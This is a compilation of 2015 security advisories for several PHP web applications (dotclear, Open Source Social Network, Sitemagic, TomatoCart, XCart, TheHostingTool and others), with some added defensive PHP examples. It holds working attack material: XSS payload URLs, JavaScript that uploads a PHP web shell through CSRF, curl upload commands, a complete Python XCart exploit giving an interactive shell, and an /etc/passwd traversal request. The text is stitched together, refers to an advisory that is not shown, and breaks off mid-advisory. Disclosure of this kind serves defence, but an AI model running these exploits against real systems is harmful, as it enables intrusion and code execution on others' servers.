The comment author name is echoed inside the value attribute of an input tag when viewing the list of all comments for that author. Quotes are not encoded, which allows for the addition of further attributes to the tag. The field is hidden, so onfocus or similar do not work, and the length of the name is limited, which makes an actual exploitation unlikely. Still, with older browsers an attacker might try to inject a style attribute which may lead to XSS.

3. Proof of Concept

1. Create a comment with the author name: " newattribute="value
2. Visit http://localhost/dotclear/admin/comments.php?n=30&status=&sortby=comment_dt&order=desc&author=%22+newattribute%3D%22value
3. The result will be:

4. Solution

To mitigate this issue please upgrade at least to version 2.8.2:
http://download.dotclear.org/latest.zip

Please note that a newer version might already be available.

5. Report Timeline

10/02/2015 Informed Vendor
10/25/2015 Vendor releases fix
11/13/2015 Disclosed to public

Blog Reference:
http://blog.curesec.com/article/blog/dotclear-281-XSS-94.html
[FD] dotclear 2.8.1: Code Execution
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: dotclear 2.8.1
Fixed in: 2.8.2
Fixed Version Link: http://download.dotclear.org/latest.zip
Vendor Website: http://dotclear.org/
Vulnerability Type: Code Execution
Remote Exploitable: Yes
Reported to vendor: 10/02/2015
Disclosed to public: 11/13/2015
Release mode: Coordinated release
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview

CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description

While upload of files with extension php, php4, and php5 is forbidden, upload of files with the extension pht, phps, and phtml is allowed, which will lead to code execution with most default Apache configurations.

The upload form is located here:
http://localhost/dotclear/admin/media.php?popup=1&plugin_id=dcLegacyEditor

A user with the right "manage their own media items" and "manage their own entries and comments" is needed to exploit this issue.

3. Code

/dotclear/inc/libs/clearbricks/filemanager

public function uploadFile($tmp,$dest,$overwrite=false)
{
    $dest = $this->pwd.'/'.path::clean($dest);

    if ($this->isFileExclude($dest)) {
        throw new Exception(__('Uploading this file is not allowed.'));
    }
    [...]
    if (@move_uploaded_file($tmp,$dest) === false) {
        throw new Exception(__('An error occurred while writing the file.'));
    }
    [...]
}
[...]
protected function isFileExclude($f)
{
    if (!$this->exclude_pattern) {
        return false;
    }
    return preg_match($this->exclude_pattern,$f);
}

/dotclear/inc/core/class.dc.media.php

$this->exclude_pattern = $core->blog->settings->system->media_exclusion;

/dotclear/inc/core/class.dc.core.php

array('media_exclusion','string','/\.php[0-9]*$/i', 'File name exclusion pattern in media manager. (PCRE value)'),

Note that after installation, the regex is retrieved from the settings table of the database, not from the code.

4. Solution

To mitigate this issue please upgrade at least to version 2.8.2:
http://download.dotclear.org/latest.zip

Please note that a newer version might already be available.

5. Report Timeline

10/02/2015 Informed Vendor
10/25/2015 Vendor releases fix
11/13/2015 Disclosed to public

Blog Reference:
http://blog.curesec.com/article/blog/dotclear-281-Code-Execution-93.html
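The ClipperCMS advisory above shows an extension whitelist that still admits .htaccess, and this dotclear advisory shows a deny-list regex (/\.php[0-9]*$/i) that admits pht, phps and phtml. The following is an added example, not code from either project, that runs the dotclear pattern over a set of constructed file names to show exactly which ones slip through, next to an allow-list check that also rejects dotfiles and multi-extension names; the allowed-extension set and the function names are assumptions, and it targets PHP 8.

```php
<?php
// Added example, not vendor code. Two upload-name checks side by side:
// 1) the deny-list regex shipped as dotclear's media_exclusion default, applied
//    exactly as isFileExclude() applies it, to show what it does not catch;
// 2) an allow-list check: single extension from an explicit set, no leading dot
//    (rejects .htaccess), no second dot anywhere in the name, no NUL bytes.

const DOTCLEAR_EXCLUSION = '/\.php[0-9]*$/i';   // value quoted in the advisory

// Extensions assumed acceptable for a media upload directory (assumption).
const ALLOWED_EXTENSIONS = ['png', 'jpg', 'jpeg', 'gif', 'zip', 'pdf', 'txt'];

// Deny-list check; true means "upload refused".
function excludedByDotclearPattern(string $name): bool
{
    return preg_match(DOTCLEAR_EXCLUSION, $name) === 1;
}

// Allow-list check; true means "upload accepted".
function acceptedByAllowList(string $name): bool
{
    $base = basename($name);                      // drop any directory component
    if ($base === '' || $base[0] === '.' || str_contains($base, "\0")) {
        return false;                             // .htaccess, .user.ini, hidden files
    }
    if (substr_count($base, '.') !== 1) {
        return false;                             // shell.php.png and friends
    }
    [$stem, $ext] = explode('.', $base, 2);
    if ($stem === '' || $ext === '') {
        return false;
    }
    return in_array(strtolower($ext), ALLOWED_EXTENSIONS, true);
}

// Constructed sample names with the outcome a reviewer would expect from each check:
//   [dotclear pattern excludes it?, allow-list accepts it?]
$samples = [
    'photo.png'     => [false, true],
    'shell.php'     => [true,  false],
    'shell.php5'    => [true,  false],
    'shell.PHP'     => [true,  false],   // /i flag covers case
    'shell.phtml'   => [false, false],   // dotclear pattern misses this
    'shell.pht'     => [false, false],   // and this
    'shell.phps'    => [false, false],   // and this
    '.htaccess'     => [false, false],   // the ClipperCMS vector
    'shell.php.png' => [false, false],   // double extension
    'dir/../x.zip'  => [false, true],    // basename is x.zip
];

foreach ($samples as $name => [$expectExcluded, $expectAccepted]) {
    $excluded = excludedByDotclearPattern($name);
    $accepted = acceptedByAllowList($name);
    printf("%-15s dotclear-excluded=%-3s allow-list-accepted=%-3s %s\n",
        $name,
        $excluded ? 'yes' : 'no',
        $accepted ? 'yes' : 'no',
        ($excluded === $expectExcluded && $accepted === $expectAccepted) ? 'ok' : 'MISMATCH');
}
```

The rows for phtml, pht and phps are the ones the advisory is about: the deny-list reports them as not excluded, while the allow-list refuses them simply because they are not on the list.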
[FD] Open Source Social Network 3.5: XSS
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: Open Source Social Network 3.5
Fixed in: 3.6
Fixed Version Link: https://www.opensource-socialnetwork.org/downloads/ossn-v3.6-1443545762.zip
Vendor Contact: https://www.opensource-socialnetwork.org/contact
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 09/29/2015
Disclosed to public: 11/13/2015
Release mode: Coordinated release
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview

There are two reflected XSS vulnerabilities in Open Source Social Network 3.5. With this, it is possible to inject JavaScript keyloggers, or to bypass CSRF protection, which in this case may lead to code execution.

3. XSS 1

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Proof of Concept

http://localhost/ossn/search?q='">alert(1)

Code

/ossn/themes/default/plugins/menus/search.php

$menus = $params['menu'];
echo "";
echo '' . ossn_print('result:type') . '';
foreach ($menus as $menu => $val) {
    foreach ($val as $link) {
        $menu = str_replace(':', '-', $link['text']);
        $icon = ossn_site_url() . "components/OssnSearch/images/{$menu}.png";
        $text = ossn_print($link['text']);
        $link = $link['href'];
        echo " {$text} ";
    }
}
echo '';

4. XSS 2

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Proof of Concept

http://localhost/ossn/home?offset=2&foo='">alert(1)

Code

/ossn/themes/default/pagination/view.php

if (count($_GET)) {
    $args_url = '';
    foreach ($_GET as $key => $value) {
        if ($key != 'page') {
            $args_url .= '&' . $key . '=' . $value;
        }
    }
}
[...]
$url = "?offset={$first}{$args_url}";
echo "".ossn_print('ossn:pagination:first')."";

5. XSS to Code Execution

Description

Because the backend allows the upload of PHP files, the XSS vulnerabilities can lead to code execution.
Proof of Concept
http://localhost/ossn/search?q='">http://localhost/s.js">

/s.js:

    var csrfProtectedPage = 'http://localhost/ossn/administrator/theme_installer';
    var html = get(csrfProtectedPage);
    document.body.innerHTML = html;
    var token = document.getElementsByName("ossn_token")[0].value;
    var timestamp = document.getElementsByName("ossn_ts")[0].value;
    submitRequest(token, timestamp);

    function get(url) {
        var xmlHttp = new XMLHttpRequest();
        xmlHttp.open("GET", url, false);
        xmlHttp.send(null);
        return xmlHttp.responseText;
    }

    function submitRequest(token, timestamp) {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://localhost/ossn/action/admin/theme_install", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---1441530840601255132539565608");
        xhr.withCredentials = true;
        var body = "-1441530840601255132539565608\r\n" +
            "Content-Disposition: form-data; name=\"ossn_ts\"\r\n" +
            "\r\n" +
            "" + timestamp + "\r\n" +
            "-1441530840601255132539565608\r\n" +
            "Content-Disposition: form-data; name=\"ossn_token\"\r\n" +
            "\r\n" +
            "" + token + "\r\n" +
            "-1441530840601255132539565608\r\n" +
            "Content-Disposition: form-data; name=\"theme_file\"; filename=\"mycustomtheme.zip\"\r\n" +
            "Content-Type: application/x-zip-compressed\r\n" +
            "\r\n" +
            /* raw zip archive bytes of mycustomtheme.zip (escaped byte string, several lines) omitted */
[FD] Sitemagic CMS 4.1: XSS
Security Advisory - Curesec Research Team

1. Introduction
Affected Product: Sitemagic CMS 4.1
Fixed in: 4.1.1
Fixed Version Link: http://sitemagic.org/index.php?SMExt=SMDownloads&SMDownloadsFile=SitemagicCMS411.zip
Vendor Contact: d...@sitemagic.org
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 09/29/2015
Disclosed to public: 11/13/2015
Release mode: Coordinated release
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview
CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description
If debug is enabled - which it is by default - the values of POST and GET are echoed unencoded, leading to an XSS vulnerability. With this, it is possible to inject JavaScript keyloggers, or to bypass CSRF protection, which in this case may lead to code execution.

3. Proof of Concept
http://localhost/Sitemagic/?dump=true&foo='">alert(1)

4. Code
index.php

    if ($debug === true) {
        $end = microtime(true);
        if (isset($_REQUEST["dump"]) === true) {
            $time = $end - $start;
            echo "Memory usage: " . memory_get_usage(true) / 1024 . " KB";
            echo "Time usage: " . $time . " seconds";
            echo " POST " . print_r($_POST, true) . " GET " . print_r($_GET, true) . " ";
        }
    }

5. XSS to Code Execution
Because the file upload in the admin area does not restrict the file type, an attacker can gain code execution via the XSS vulnerability.
http://localhost/Sitemagic/?dump=true&foo=">http://localhost/s.js">

/s.js:

    submitRequest();

    function submitRequest() {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://localhost/Sitemagic/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages%2Fdemo", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---72100436920187879541838388265");
        xhr.withCredentials = true;
        var body = "-72100436920187879541838388265\r\n" +
            "Content-Disposition: form-data; name=\"SMInputSMFilesUpload\"; filename=\"shell.php\"\r\n" +
            "Content-Type: application/x-php\r\n" +
            "\r\n" +
            "\x3c?php passthru($_GET[\'x\']); ?\x3e\n" +
            "\r\n" +
            "-72100436920187879541838388265\r\n" +
            "Content-Disposition: form-data; name=\"SMPostBackControl\"\r\n" +
            "\r\n" +
            "\r\n" +
            "-72100436920187879541838388265--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
    }

6. Solution
To mitigate this issue please upgrade at least to version 4.1.1:
http://sitemagic.org/index.php?SMExt=SMDownloads&SMDownloadsFile=SitemagicCMS411.zip
Please note that a newer version might already be available.

7. Report Timeline
09/29/2015 Informed Vendor about Issue
09/29/2015 Vendor releases fix
11/13/2015 Disclosed to public

Blog Reference:
http://blog.curesec.com/article/blog/Sitemagic-CMS-41-XSS-91.html
[FD] Thelia 2.2.1: XSS
Security Advisory - Curesec Research Team

1. Introduction
Affected Product: Thelia 2.2.1
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Contact: i...@thelia.net
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 09/29/2015
Disclosed to public: 11/13/2015
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview
CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description
Thelia 2.2.1 suffers from an XSS vulnerability. With this, it is for example possible to inject JavaScript keyloggers, or to bypass CSRF protection.

3. Proof of Concept
http://localhost/thelia_2.1.5/web/admin/home/stats?month=95&year=20155

4. Solution
This issue has not been fixed by the vendor.

5. Report Timeline
09/29/2015 Informed Vendor about Issue (no reply)
10/21/2015 Reminded Vendor of Disclosure Date (no reply)
11/13/2015 Disclosed to public

Blog Reference:
http://blog.curesec.com/article/blog/Thelia-221-XSS-90.html
[FD] TomatoCart v1.1.8.6.1: XSS
Security Advisory - Curesec Research Team

1. Introduction
Affected Product: TomatoCart v1.1.8.6.1
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Contact: supp...@tomatocart.com
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 09/29/2015
Disclosed to public: 11/13/2015
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview
There are two reflected XSS vulnerabilities in TomatoCart v1.1.8.6.1. With this, it is possible to inject JavaScript keyloggers, or to bypass CSRF protection, which in the case of TomatoCart may lead to code execution.

3. XSS 1
CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Proof of Concept
http://localhost/ecommerce/TomatoCart-v1-released-v1.1.8.6.1/info.php?faqs&faqs_id='">alert(1)

Code
templates/bootstrap/content/info/faqs.php:70

    if(question.getParent().id == 'faq') {
        question.getElement('i').set('class', 'icon-minus');
        question.getNext().setStyle('display', '');
    }

4. XSS 2
CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Proof of Concept
http://localhost/ecommerce/TomatoCart-v1-released-v1.1.8.6.1/checkout.php?checkout&view='">alert(1)

Code
templates/bootstrap/content/checkout/checkout.php:182

    view: '',

5. Solution
This issue has not been fixed by the vendor.

6. Report Timeline
09/29/2015 Informed Vendor about Issue (no reply)
10/21/2015 Reminded Vendor of Disclosure Date (no reply)
11/13/2015 Disclosed to public

Blog Reference:
http://blog.curesec.com/article/blog/TomatoCart-v11861-XSS-89.html
[FD] TomatoCart v1.1.8.6.1: Code Execution
Security Advisory - Curesec Research Team

1. Introduction
Affected Product: TomatoCart v1.1.8.6.1
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Contact: supp...@tomatocart.com
Vulnerability Type: Code Execution
Remote Exploitable: Yes
Reported to vendor: 09/29/2015
Disclosed to public: 11/13/2015
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview
TomatoCart has multiple locations where the upload of images is allowed. In two of these locations, the file type and extension of the uploaded file are not checked, which leads to code execution. Please note that an admin account with at least some privileges is required to exploit this issue.

3. Code Execution 1
CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description
When uploading a new slide image, there are no checks as to what type the uploaded image actually is. Because of this, an attacker that gained admin credentials can upload a PHP file and thus gain code execution. The rights needed are Content -> Slide Images.

Proof of Concept

    curl -i -s -k -X 'POST' \
        -H 'Content-Type: multipart/form-data; boundary=1106460043' \
        -b 'toCAdminID=4tfpeotn6bp65cm70mcekauhk1; PHPSESSID=6hioh2kisld85o5f3qo3e5gf86' \
        --data-binary $'--1106460043\x0d\x0aContent-Disposition: form-data; name=\"image1\"; filename=\"test2.php\"\x0d\x0aContent-Type: application/x-php\x0d\x0a\x0d\x0ahttp://localhost/ecommerce/TomatoCart-v1-released-v1.1.8.6.1/admin/json.php'

4. Code Execution 2
CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description
When uploading a new product image, there are no checks as to what type the uploaded image actually is. Because of this, an attacker that gained admin credentials can upload a PHP file and thus gain code execution. The rights needed are Content -> Products.
Proof of Concept

    curl -i -s -k -X 'POST' \
        -H 'Content-Type: multipart/form-data; boundary=1775010584' \
        -b 'toCAdminID=4tfpeotn6bp65cm70mcekauhk1; PHPSESSID=6hioh2kisld85o5f3qo3e5gf86' \
        --data-binary $'--1775010584\x0d\x0aContent-Disposition: form-data; name=\"APC_UPLOAD_PROGRESS\"\x0d\x0a\x0d\x0a5305684637\x0d\x0a--1775010584\x0d\x0aContent-Disposition: form-data; name=\"UPLOAD_IDENTIFIER\"\x0d\x0a\x0d\x0a5305684637\x0d\x0a--1775010584\x0d\x0aContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\x0d\x0a\x0d\x0a4194304\x0d\x0a--1775010584\x0d\x0aContent-Disposition: form-data; name=\"ext-gen4881\"; filename=\"test.php\"\x0d\x0aContent-Type: application/x-php\x0d\x0a\x0d\x0ahttp://localhost/ecommerce/TomatoCart-v1-released-v1.1.8.6.1/admin/json.php?module=products&action=upload_image'

5. Solution
This issue has not been fixed by the vendor.

6. Report Timeline
09/29/2015 Informed Vendor about Issue (no reply)
10/21/2015 Reminded Vendor of Disclosure Date (no reply)
11/13/2015 Disclosed to public

Blog Reference:
http://blog.curesec.com/article/blog/TomatoCart-v11861-Code-Execution-88.html
[FD] XCart 5.2.6: Code Execution Exploit
    #!/usr/local/bin/python
    # Exploit for XCart 5.2.6 Code Execution vulnerability
    # An admin account is required to use this exploit
    # Curesec GmbH

    import sys
    import re
    import requests  # requires requests lib

    if len(sys.argv) != 4:
        exit("usage: python " + sys.argv[0] + " http://example.com/xcart/ ad...@example.com admin")

    url = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]

    loginPath = "/admin.php?target=login"
    fileManagerPath = "/admin.php?target=logo_favicon"
    shellFileName = "404.php"
    shellContent = "GIF89a;"


    def login(requestSession, url, username, password):
        # Fetch the login form once to obtain the CSRF token, then post the credentials.
        csrfRequest = requestSession.get(url)
        csrfTokenRegEx = re.search('name="xcart_form_id" type="hidden" value="(.*)" class', csrfRequest.text)
        csrfToken = csrfTokenRegEx.group(1)
        postData = {"target": "login", "action": "login", "xcart_form_id": csrfToken,
                    "login": username, "password": password}
        loginResult = requestSession.post(url, data=postData).text
        return "Invalid login or password" not in loginResult


    def upload(requestSession, url, fileName, fileContent):
        # Fetch the favicon settings form for its CSRF token, then submit the file as "logo".
        csrfRequest = requestSession.get(url)
        csrfTokenRegEx = re.search('SimpleCMS" />\n', csrfRequest.text)
        csrfToken = csrfTokenRegEx.group(1)
        filesData = {"logo": (fileName, fileContent)}
        postData = {"target": "logo_favicon", "action": "update", "page": "CDev\\SimpleCMS",
                    "xcart_form_id": csrfToken}
        uploadResult = requestSession.post(url, files=filesData, data=postData)
        return "The data has been saved successfully" in uploadResult.text


    def runShell(url):
        print("enter command, or enter exit to quit.")
        command = raw_input("$ ")
        while "exit" not in command:
            print(requests.get(url + command).text.replace("GIF89a;", ""))
            command = raw_input("$ ")


    requestSession = requests.session()

    if login(requestSession, url + loginPath, username, password):
        print("successful: login")
    else:
        exit("ERROR: Incorrect username or password")

    if upload(requestSession, url + fileManagerPath, shellFileName, shellContent):
        print("successful: file uploaded")
    else:
        exit("ERROR: could not upload file")

    runShell(url + shellFileName + "?x=")

Blog Reference:
http://blog.curesec.com/article/blog/XCart-526-Code-Execution-Exploit-87.html
[FD] XCart 5.2.6: Code Execution
Security Advisory - Curesec Research Team

1. Introduction
Affected Product: XCart 5.2.6
Fixed in: 5.2.7
Fixed Version Link: https://www.x-cart.com/xc5kit
Vendor Contact: supp...@x-cart.com
Vulnerability Type: Code Execution
Remote Exploitable: Yes
Reported to vendor: 08/13/2015
Disclosed to public: 11/04/2015
Release mode: Coordinated release
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Vulnerability Description
When uploading a favicon (http://localhost/anew/xcart/admin.php?target=logo_favicon), there is no check as to what type or extension the file has. This allows an attacker that gained admin credentials to upload a PHP file and thus gain code execution.

3. Solution
To mitigate this issue please upgrade at least to version 5.2.7:
https://www.x-cart.com/xc5kit
Please note that a newer version might already be available.

4. Report Timeline
08/13/2015 Informed Vendor about Issue
09/03/2015 Vendor Requests more time
10/19/2015 Vendor releases fix
11/04/2015 Disclosed to public

Blog Reference:
http://blog.curesec.com/article/blog/XCart-526-Code-Execution-86.html
[FD] XCart 5.2.6: Path Traversal
Security Advisory - Curesec Research Team

1. Introduction
Affected Product: XCart 5.2.6
Fixed in: 5.2.7
Fixed Version Link: https://www.x-cart.com/xc5kit
Vendor Contact: supp...@x-cart.com
Vulnerability Type: Path Traversal
Remote Exploitable: Yes
Reported to vendor: 08/13/2015
Disclosed to public: 11/04/2015
Release mode: Coordinated release
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Arbitrary File Download
Description
When downloading a file, the input is not properly protected against directory traversal, which makes it possible to download arbitrary files. Please note that admin credentials are required.

Proof of Concept
http://localhost/anew/xcart/skins/admin/en/modules/CDev/TinyMCE/js/tinymce/plugins/filemanager/force_download.php
POST: path=/////////////////..etc/passwd&name=download.txt

Code
/skins/admin/en/modules/CDev/TinyMCE/js/tinymce/plugins/filemanager/force_download.php:10

    $path=joinPaths($root,$upload_dir,$_POST['path']);
    $path=str_replace(LC_DS . '..', '', $path);
    $name=$_POST['name'];
    header('Pragma: private');
    header('Cache-control: private, must-revalidate');
    header("Content-Type: application/octet-stream");
    header("Content-Length: " .(string)(filesize($path)) );
    header('Content-Disposition: attachment; filename="'.($name).'"');
    readfile($path);

3. List Directories
Description
It is possible to list the directories contained by any directory due to a directory traversal vulnerability via the fldr POST argument. This may be used to gather information about the target system. Please note that admin credentials are required.

Proof of Concept
http://localhost/anew/xcart/skins/admin/en/modules/CDev/TinyMCE/js/tinymce/plugins/filemanager/dialog.php?type=0&editor=mce_0&popup=0&lang=en_EN&field_id=&fldr=../../../../../../

4. Solution
To mitigate this issue please upgrade at least to version 5.2.7:
https://www.x-cart.com/xc5kit
Please note that a newer version might already be available.

5. Report Timeline
08/13/2015 Informed Vendor about Issue
09/03/2015 Vendor Requests more time
10/19/2015 Vendor releases fix
11/04/2015 Disclosed to public

Blog Reference:
http://blog.curesec.com/article/blog/XCart-526-Path-Traversal-85.html
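An added illustration, not X-Cart code, of why the single str_replace() in force_download.php does not contain the path, beside a containment check built on realpath(); the temporary directory tree and the traversal input are constructed for the demo:

```php
<?php
// Added example (not X-Cart code): the advisory's str_replace() pattern beside
// a containment check based on realpath(). The temporary directory tree and the
// traversal input below are constructed for this demonstration.

// Mirrors force_download.php: glue the user path under the upload root, then
// delete the literal "/.." sequence. str_replace() makes one left-to-right pass,
// so a "/.." that only appears after the first match is removed survives, and
// nothing checks that the result still lies under the root.
function vulnerable_path(string $root, string $userPath): string
{
    $path = $root . '/' . $userPath;
    return str_replace('/..', '', $path);
}

// Hardened variant: resolve the root and the requested file to canonical
// absolute paths and require the file to sit inside the root.
function safe_path(string $root, string $userPath): ?string
{
    $base = realpath($root);
    if ($base === false) {
        return null;
    }
    $resolved = realpath($root . '/' . $userPath);
    if ($resolved === false) {
        return null;                       // missing file or dangling symlink
    }
    // Compare with a trailing separator so "/srv/uploads-old" is not accepted
    // for a root of "/srv/uploads".
    if (strncmp($resolved . '/', $base . '/', strlen($base) + 1) !== 0) {
        return null;
    }
    return $resolved;
}

// Throwaway tree: <tmp>/uploads/report.txt is meant to be downloadable,
// <tmp>/secret.txt sits one level above the upload root.
$tmp = sys_get_temp_dir() . '/traversal_demo_' . getmypid();
mkdir($tmp . '/uploads', 0700, true);
file_put_contents($tmp . '/uploads/report.txt', "public\n");
file_put_contents($tmp . '/secret.txt', "private\n");
$root = $tmp . '/uploads';

// Constructed traversal input: one "/.." is stripped from "//..../secret.txt",
// leaving "/../secret.txt" relative to the root.
$traversal = '/..../secret.txt';

echo "vulnerable path : ", vulnerable_path($root, $traversal), "\n";
echo "reaches secret? : ", is_file(vulnerable_path($root, $traversal)) ? 'yes' : 'no', "\n";
echo "safe_path       : ", var_export(safe_path($root, $traversal), true), "\n";
echo "legit file      : ", var_export(safe_path($root, 'report.txt'), true), "\n";

// Clean up the demo tree.
unlink($tmp . '/uploads/report.txt');
unlink($tmp . '/secret.txt');
rmdir($tmp . '/uploads');
rmdir($tmp);
```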
[FD] XCart 5.2.6: XSS
Security Advisory - Curesec Research Team

1. Introduction
Affected Product: XCart 5.2.6
Fixed in: 5.2.7
Fixed Version Link: https://www.x-cart.com/xc5kit
Vendor Contact: supp...@x-cart.com
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 08/13/2015
Disclosed to public: 11/04/2015
Release mode: Coordinated release
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Vulnerability Description
There are multiple XSS vulnerabilities in the dialog.php file. This allows an attacker to execute arbitrary JavaScript in the context of the browser of a victim if the victim clicks on an attacker supplied link or visits an attacker controlled website. With this, it is possible to bypass CSRF protection and thus do anything the victim can do, inject a JavaScript keylogger, or perform phishing attacks.

3. Proof of Concept
http://localhost/anew/xcart/skins/admin/en/modules/CDev/TinyMCE/js/tinymce/plugins/filemanager/dialog.php?editor=">alert(1)&lang=">alert(2)&field_id=">alert(3)&fldr=">alert(4)&type=">alert(5)

4. Solution
To mitigate this issue please upgrade at least to version 5.2.7:
https://www.x-cart.com/xc5kit
Please note that a newer version might already be available.

5. Report Timeline
08/13/2015 Informed Vendor about Issue
09/03/2015 Vendor Requests more time
10/19/2015 Vendor releases fix
11/04/2015 Disclosed to public

Blog Reference:
http://blog.curesec.com/article/blog/XCart-526-XSS-84.html
[FD] SQLiteManager 1.2.4: Multiple XSS
SQLiteManager 1.2.4: Multiple XSS

Security Advisory - Curesec Research Team

1. Introduction
Affected Product: SQLiteManager 1.2.4
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Contact: sqlitemana...@gmail.com
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 09/01/2015
Disclosed to public: 10/07/2015
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Vulnerability Description
There are multiple XSS vulnerabilities in SQLiteManager 1.2.4. With this, it is possible to steal cookies, bypass CSRF protection, or inject JavaScript keyloggers.

3. Proof of Concept
http://localhost/SQLiteManager-1.2.4/main.php?dbsel=2&function=">alert(1)
http://localhost/SQLiteManager-1.2.4/main.php?dbsel=2&table=">alert(1)
http://localhost/SQLiteManager-1.2.4/main.php?dbsel=2&trigger=">alert(1)
http://localhost/SQLiteManager-1.2.4/main.php?dbsel=2&view=">alert(1)
http://localhost/SQLiteManager-1.2.4/main.php?dbsel=2&action=browseItem&DisplayQuery=alert(1)
http://localhost/SQLiteManager-1.2.4/main.php?dbsel=1&table=t1&action=insertElement&currentPage=0'">alert(1)

4. Solution
This issue was not fixed by the vendor.

5. Report Timeline
09/01/2015 Informed Vendor about Issue (no reply)
09/22/2015 Reminded Vendor of disclosure date (no reply)
10/07/2015 Disclosed to public

6. Blog Reference:
http://blog.curesec.com/article/blog/SQLiteManager-124-Multiple-XSS-67.html
[FD] TheHostingTool 1.2.6: Multiple XSS
Security Advisory - Curesec Research Team

1. Introduction
Affected Product: TheHostingTool 1.2.6
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: https://thehostingtool.com/
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 09/07/2015
Disclosed to public: 10/07/2015
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Description
There are two reflected and one persistent XSS in TheHostingTool 1.2.6. With this, it is possible to bypass CSRF protection, inject JavaScript keyloggers, or perform phishing attacks.

3. Details

Reflected XSS 1
Proof of Concept:
http://localhost/ecommerce/THTv1.2.6/includes/ajax.php?function=notice&message=alert(1)&status

Code:
includes/ajax.php

    function notice() {
        global $style;
        if(isset($_REQUEST['status']) and isset($_REQUEST['message'])) {
            if($_REQUEST['status'] == "good") {
                $status = true;
            } else {
                $status = false;
            }
            echo $style->notice($status, $_REQUEST['message']);
        }
        return true;
    }

includes/class_style.php

    public function notice($good, $message) {
        if($good) {
            //Cool! Everything's OK.
            $color = "green";
        } else {
            //Oh no! It's a bad message!
            $color = "red";
        }
        $notice = '';
        $notice .= $message;
        $notice .= '';
        return $notice;
    }

Reflected XSS 2
Proof of Concept:
http://localhost//ecommerce/THTv1.2.6/admin/?page=invoices&pay&iid=">alert(1)

Code:
invoices.php:

    class page {
        public function content(){
            # Displays the page
            global $style, $db, $main, $invoice;
            if(isset($_GET['iid']) and isset($_GET['pay'])){
                $invoice->set_paid($_GET['iid']);
                echo "Invoice #{$_GET['iid']} marked as paid. Undo this action";
            } elseif(isset($_GET['iid']) and isset($_GET['unpay'])){
                $invoice->set_unpaid($_GET['iid']);
                echo "Invoice {$_GET['iid']} marked as unpaid. Undo this action";
            }

Persistent XSS
Proof of Concept:
1. Create a new order here: http://localhost/ecommerce/THTv1.2.6/order/
2. When asked for a domain, enter: http://ex.alert(1).com
3. Visit http://localhost/ecommerce/THTv1.2.6/admin/?page=logs or http://localhost/ecommerce/THTv1.2.6/admin/?page=users&sub=search&do=USERID

4. Solution
This issue has not been fixed.

5. Report Timeline
09/07/2015 Informed Vendor about Issue (no reply)
09/22/2015 Reminded Vendor of disclosure date (no reply)
10/07/2015 Disclosed to public

Blog Reference:
http://blog.curesec.com/article/blog/TheHostingTool-126-Multiple-XSS-78.html
[FD] TheHostingTool 1.2.6: Multiple SQL Injection
Security Advisory - Curesec Research Team

1. Introduction
Affected Product: TheHostingTool 1.2.6
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: https://thehostingtool.com/
Vulnerability Type: SQL Injection
Remote Exploitable: Yes
Reported to vendor: 09/07/2015
Disclosed to public: 10/07/2015
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Description
